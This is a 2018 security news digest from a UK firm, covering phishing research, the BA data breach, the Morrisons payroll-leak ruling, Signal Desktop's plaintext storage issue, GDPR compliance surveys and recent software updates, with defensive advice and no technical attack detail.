news181026

FFT news digest Oct 26 2018

Top phish

New research suggests the key threat to businesses in the US is phishing (where criminals try to fool us into handing over credentials for services or networks). The 2018 U.S. State of Cybercrime Survey found that the biggest issues were caused by employees who fell for scams, and also by mixing work and personal use of devices and services. Separate research by an email security provider offers a list of the most targeted brands. At the top are Microsoft, PayPal and Netflix. And Business Insider reports on a current scam to try to obtain Apple ID credentials by asking users to review a Spotify subscription. These types of scams are becoming more professional, and more targeted. Training is part of the answer, and it comes down to a simple message; if it involves something important, never click on a link or phone a number you're given.

Bugging Trump

Researchers have been scratching their heads over a New York Times report claiming Russia and China are listening to President Trump's personal cellphone calls. According to unnamed officials, calls "are intercepted as they travel through the cell towers, cables and switches that make up national and international cellphone networks." The Times report provides almost no details to substantiate its claims (which President Trump has rejected on Twitter). But it is well-known that cellular networks are inherently insecure because of flaws in the underlying technology. Our advice is that sensitive conversations (with confidential sources, for example) are best done using a solution which encrypts the content. In President Trump's case, even if his official iPhones are secure, it would be relatively easy to target private recipients of his calls.

GDPR non-compliance

Five months after enforcement of the new European data protection regulation began, a survey has found most business are not fully compliant. According to the report from the International Association of Privacy Professionals (IAPP), "More than half the respondents (56%) subject to GDPR say they are far from compliance or will never comply." And 1 in 5 organisations that took part said they believed full compliance was impossible. Given the complexity of the GDPR, such figures are not surprising. Any organisation claiming complete compliance might be well-advised to consider the grounds for its statement. As we've set out previously, they key to complying with the GDPR is to ensure data protection is built into the fabric of an organisation. To that end, nearly half the businesses surveyed by the IAPP said they had appointed a Data Protection Officer (DPO) even though they weren't required to. They said the role served "a valuable function". We have a longer article looking at the issues around DPOs and EU Representatives - and who needs one.

Morrisons ruling

UK supermarket group, Morrisons, has lost its challenge to a High Court ruling that it is liable for the actions of a disgruntled employee who leaked the company's entire payroll. The case involves a claim for compensation by more than 5,000 of the staff who were affected. It's the first class action in the UK involving a leak of personal data, and the ruling comes despite the rogue employee being given an 8-year prison sentence for his actions. Morrisons had argued that it could not be held liable for criminal misuse of its data, but the ruling suggests companies will have to meet a high standard if such an argument is to be accepted. In particular, it's likely that companies will be required to demonstrate stringent controls are in place to protect personal data, including restrictions on removable storage and monitoring of what data is being accessed, and when. Morrisons told the BBC that it had acted responsibly, and says it will appeal to the Supreme Court.

Signal on the desktop

We are firm supporters of the Signal communication app, and use it ourselves, but it's important to be aware of issues with the desktop version. This week, security researcher, Matt Suiche, noticed a problem with the process in upgrading from Signal's Chrome Extension to Signal Desktop. The upshot of the problem was that the user's messages ended up being stored as plaintext files, and remained there even after the upgrade was complete. It's not the first time issues have arisen with the way in which data is stored by the desktop versions of messaging solutions like Signal. In most cases these versions are add-ons which were created later for convenience. Another researcher warned about disappearing messages (which are designed to automatically delete themselves after a set period.) Attached media files remain intact - and unencrypted even after the message disappears. We're not suggesting this is a reason not to use Signal - but it is important to be aware of these issues in the event a laptop were to be searched.

BA data breach

BA says it's notifying a further 185,000 people that their personal details may have been stolen in this year's data breach. In a press release, BA said details of 77,000 payment cards could have been compromised, including card numbers, expiry date and card verification value (CVV) numbers. The other 108,000 did not have the CVV stolen. The attack targeted people making reward bookings and anyone who used a payment card between 21 April and 28 July 2018. BA says it is concluding its internal investigation, but has provided no details of what lay behind the data breach. Researchers believe a group known as Magecart was responsible for a series of attacks, including the one on BA. One of the questions that BA will have to answer is why the payment element of its booking process wasn't isolated in a way that would have defeated the attack.

In brief

The risks of dodgy websites. The US Geological Survey's computer network was infected with malicious software. Government auditors traced the infection back to a single employee who had used his work computer to view pornography websites.

How much is your time worth? Under a proposed settlement, US users affected by the Yahoo data breach can claim $25 an hour for time spent dealing with the fallout from the biggest security breach yet seen. Yahoo has agreed to pay $50 million into a compensation fund, and bear the cost of credit monitoring services.

Out of date WordPress installations are a serious security risk, so much so that WordPress has committed itself to "wiping older versions from existence on the internet".

Forbes reports that Apple has managed to defeat the GrayKey security tool which is widely used by law enforcement to crack iPhones. Meanwhile, the UK's National Cyber Security Centre has released guidance for organisations which have issued iOS 12 devices to users.

Malaysian researchers have found a way to send smells over the internet. It involves converting a digital message into electrical current and using it to stimulate the recipient's neurons. It also involves inserting electrodes (far) up the nostrils. The idea might need some work.

Updates

Cisco: update to address vulnerability in the update service of Cisco Webex Meetings Desktop App for Windows which could allow an authenticated, local attacker to execute arbitrary commands as a privileged user.

Mozilla: Firefox 63 includes new capability designed to prevent tracking users between separate websites. It's based on a new cookie policy which aims to defeat third-party tracking tools and minimise the problems sometimes caused by wholesale blocking of cookies.

Media players: Make sure you're using the latest version of media players like VLC and MPlayer which are among those affected by a serious vulnerability in an underlying software component.

SecureDrop: Version 0.10.0 includes an update of the OSSEC monitoring software. The developers warn of a possible installation failure in some circumstances.

Tails: Version 3.10.1 fixes a number of significant security vulnerabilities.

Full Frame Technology

What we do
Who we are
Need to know
Privacy Notice
Website terms

Address

152-160 City Road
London, EC1V 2NX

Contacts
Email: info@fullframetech.com
Phone: +44 (0) 20 3290 2205
Support: +44 (0) 20 3290 2207

Company registration no. 10243217